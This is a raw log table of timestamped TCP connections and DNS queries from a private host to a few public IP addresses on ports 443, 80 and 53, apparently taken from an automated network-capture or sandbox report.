Feb 25, 2025 08:27:39.581568956 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.583591938 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.583676100 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.583688974 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.583729029 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.585853100 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.585921049 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.585942984 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.586050034 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.588160992 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.588222980 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.588243961 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.588296890 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.590528965 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.590617895 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.590630054 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.590759993 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.592729092 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.592796087 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.592812061 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.592946053 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.595056057 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.595128059 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.595160007 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.595202923 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.597393036 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.597476006 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.597486019 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.597541094 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.599699974 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.599833965 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.599852085 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.599973917 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.602025032 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.602174997 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.602183104 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.602237940 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.604327917 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.604391098 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.604425907 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.604482889 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.606527090 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.606686115 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.606702089 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.606754065 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.608891010 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.608956099 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.608963966 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.609005928 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.611249924 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.611301899 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.611325979 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.611411095 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.613493919 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.613549948 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.613558054 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.613636017 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.615710020 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.615763903 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.615770102 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.615813017 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.618055105 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.618103981 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.618119955 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.618256092 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.620326042 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.620378971 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.620383978 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.620436907 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.622580051 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.622617006 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.622699022 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.622739077 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.624864101 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.624907017 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.625533104 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.625583887 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.627149105 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.627248049 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.627255917 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.627330065 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.629393101 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.629436970 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.630526066 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.630592108 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.631823063 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.631884098 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.631891966 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.631937981 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.634013891 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.634114981 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.635240078 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.635320902 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.636322021 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.636370897 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.636390924 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.636486053 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.638573885 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.638628006 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.639744997 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.639810085 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.640856981 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.640938997 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.640948057 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.640985012 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.643034935 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.643162012 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.643943071 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.643987894 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.645243883 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.645302057 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.645323992 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.645375967 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.647291899 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.647336006 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.648010015 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.648067951 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.649584055 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.649676085 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.649694920 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.649738073 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.649796009 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.649835110 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.651642084 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.651765108 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.652245045 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.652316093 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.653719902 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.653799057 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.653815985 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.653889894 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.656944990 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.657016039 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.657027006 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.657074928 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.658025980 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.658122063 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.658128977 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.658193111 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.660856009 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.660902023 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.660934925 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.660974979 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.664694071 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.664735079 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.664768934 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.664830923 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.665507078 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.665596008 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.665604115 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.665652990 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.667404890 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.667447090 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.667484999 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.667529106 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.669018984 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.669059038 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.669092894 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.669187069 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.670743942 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.670793056 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.670821905 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.671003103 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.672410965 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.672472954 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.672544956 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.672694921 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.674177885 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.674256086 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.674264908 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.674333096 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.676204920 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.676388025 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.676403046 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.676440001 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.677397966 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.677453041 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.677458048 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.677512884 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.678888083 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.678949118 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.679023981 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.679059029 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.680507898 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.680566072 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.680582047 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.680622101 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.681966066 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.682017088 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.682115078 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.682163954 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.683561087 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.683612108 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.683640957 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.683691978 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.685125113 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.685192108 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.685204983 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.685292006 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.686487913 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.686541080 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.686625004 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.686670065 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.687994003 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.688158035 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.688174009 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.688215017 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.689343929 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.689418077 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.689430952 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.689482927 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.690689087 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.690762043 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.690788984 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.690844059 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.690860987 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.690927029 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.692152977 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.692200899 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.692236900 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.692284107 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.693437099 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.693496943 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.693592072 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.693634987 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.694802046 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.694864035 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.694936991 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.695049047 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.696068048 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.696115971 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.696192980 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.696285963 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.697571993 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.697695017 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.697705030 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.697747946 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.698709965 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.698765993 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.698791981 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.698832989 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.700215101 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.700258017 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.700361967 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.700413942 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.700453043 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.700500011 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.700536966 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.700579882 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:39.700591087 CET | 443 | 49781 | 142.250.185.193 | 192.168.2.4 |
Feb 25, 2025 08:27:39.700639009 CET | 49781 | 443 | 192.168.2.4 | 142.250.185.193 |
Feb 25, 2025 08:27:40.372189045 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:40.377310991 CET | 80 | 49812 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:40.377404928 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:40.377614021 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:40.382644892 CET | 80 | 49812 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:40.949151993 CET | 80 | 49812 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:40.973191023 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:40.978277922 CET | 80 | 49812 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:41.130731106 CET | 80 | 49812 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:41.175107956 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:41.692517042 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:41.692554951 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:41.694996119 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:41.696948051 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:41.696966887 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.165481091 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.165582895 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:42.179081917 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:42.179106951 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.179506063 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.204638958 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:42.251332045 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.309708118 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.309775114 CET | 443 | 49818 | 104.21.96.1 | 192.168.2.4 |
Feb 25, 2025 08:27:42.311794996 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:42.329853058 CET | 49818 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:42.383109093 CET | 49812 | 80 | 192.168.2.4 | 158.101.44.242 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 25, 2025 08:27:34.686697960 CET | 52480 | 53 | 192.168.2.4 | 1.1.1.1 |
Feb 25, 2025 08:27:34.693865061 CET | 53 | 52480 | 1.1.1.1 | 192.168.2.4 |
Feb 25, 2025 08:27:35.923798084 CET | 57736 | 53 | 192.168.2.4 | 1.1.1.1 |
Feb 25, 2025 08:27:35.931056023 CET | 53 | 57736 | 1.1.1.1 | 192.168.2.4 |
